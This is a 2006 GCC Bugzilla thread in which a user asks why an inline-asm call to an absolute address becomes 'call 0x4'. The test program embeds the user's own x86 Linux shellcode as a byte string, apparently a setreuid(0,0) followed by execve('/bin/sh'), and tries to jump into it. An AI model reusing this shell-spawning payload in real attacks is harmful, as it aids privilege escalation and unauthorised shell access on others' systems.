[Bug inline-asm/30002] New: Problem with call directive in inline ASM
Hi,
I've written this program to try a shellcode made by me:
char shell[] =
"\xeb\x25\x5e\xb8\x46\x00\x00\x00"
"\xbb\x00\x00\x00\x00\xb9\x00\x00"
"\x00\x00\xcd\x80\xb8\x0b\x00\x00"
"\x00\x89\xf3\x6a\x00\x56\x89\xe4"
"\xba\x00\x00\x00\x00\xcd\x80\xe8"
"\xd6\xff\xff\xff"
"/bin/sh";
main() {
printf ("%p\n",shell);
__asm__("call 0x08049600");
}
Where, of course, 0x08049600 is the address of my shellcode.
But when I compile and run the program I get a segmentation fault.
This is what I get disassembling the program with Gdb:
0x080483a4 :push %ebp
0x080483a5 :mov%esp,%ebp
0x080483a7 :sub$0x8,%esp
0x080483aa :and$0xfff0,%esp
0x080483ad :mov$0x0,%eax
0x080483b2 : add$0xf,%eax
0x080483b5 : add$0xf,%eax
0x080483b8 : shr$0x4,%eax
0x080483bb : shl$0x4,%eax
0x080483be : sub%eax,%esp
0x080483c0 : sub$0x8,%esp
0x080483c3 : push $0x8049600
0x080483c8 : push $0x80484e4
0x080483cd : call 0x80482b8 <[EMAIL PROTECTED]>
0x080483d2 : add$0x10,%esp
0x080483d5 : call 0x4
0x080483da : leave
0x080483db : ret
Why do I have a call 0x4 on main+49 instead of call 0x08049600?
--
Summary: Problem with call directive in inline ASM
Product: gcc
Version: 3.4.6
Status: UNCONFIRMED
Severity: normal
Priority: P3
Component: inline-asm
AssignedTo: unassigned at gcc dot gnu dot org
ReportedBy: blacklight86 at gmail dot com
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=30002
[Bug inline-asm/30002] Problem with call directive in inline ASM
--- Comment #2 from blacklight86 at gmail dot com 2006-11-28 13:48 ---
This is what I do and what I get:
[EMAIL PROTECTED]:~/prog/shell$ gcc -o vuln vuln.c
[EMAIL PROTECTED]:~/prog/shell$ ./vuln
0x8049600
Segmentation fault
Where 0x8049600 is the address of my shellcode, obtained this way:
char shell[] =
"\xeb\x25\x5e\xb8\x46\x00\x00\x00"
"\xbb\x00\x00\x00\x00\xb9\x00\x00"
"\x00\x00\xcd\x80\xb8\x0b\x00\x00"
"\x00\x89\xf3\x6a\x00\x56\x89\xe4"
"\xba\x00\x00\x00\x00\xcd\x80\xe8"
"\xd6\xff\xff\xff"
"/bin/sh";
main() {
printf ("%p\n",shell);
__asm__("call 0x8049600");
}
So I'm quite sure 0x8049600 is the REAL address of my shellcode. I guessed it's
a linker problem...but why? The reference in the call it's quite accurate I
think...
--
blacklight86 at gmail dot com changed:
What|Removed |Added
Status|RESOLVED|UNCONFIRMED
Resolution|INVALID |
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=30002
[Bug inline-asm/30002] Problem with call directive in inline ASM
--- Comment #4 from blacklight86 at gmail dot com 2006-11-28 13:57 --- How can I start the shellcode then? -- http://gcc.gnu.org/bugzilla/show_bug.cgi?id=30002
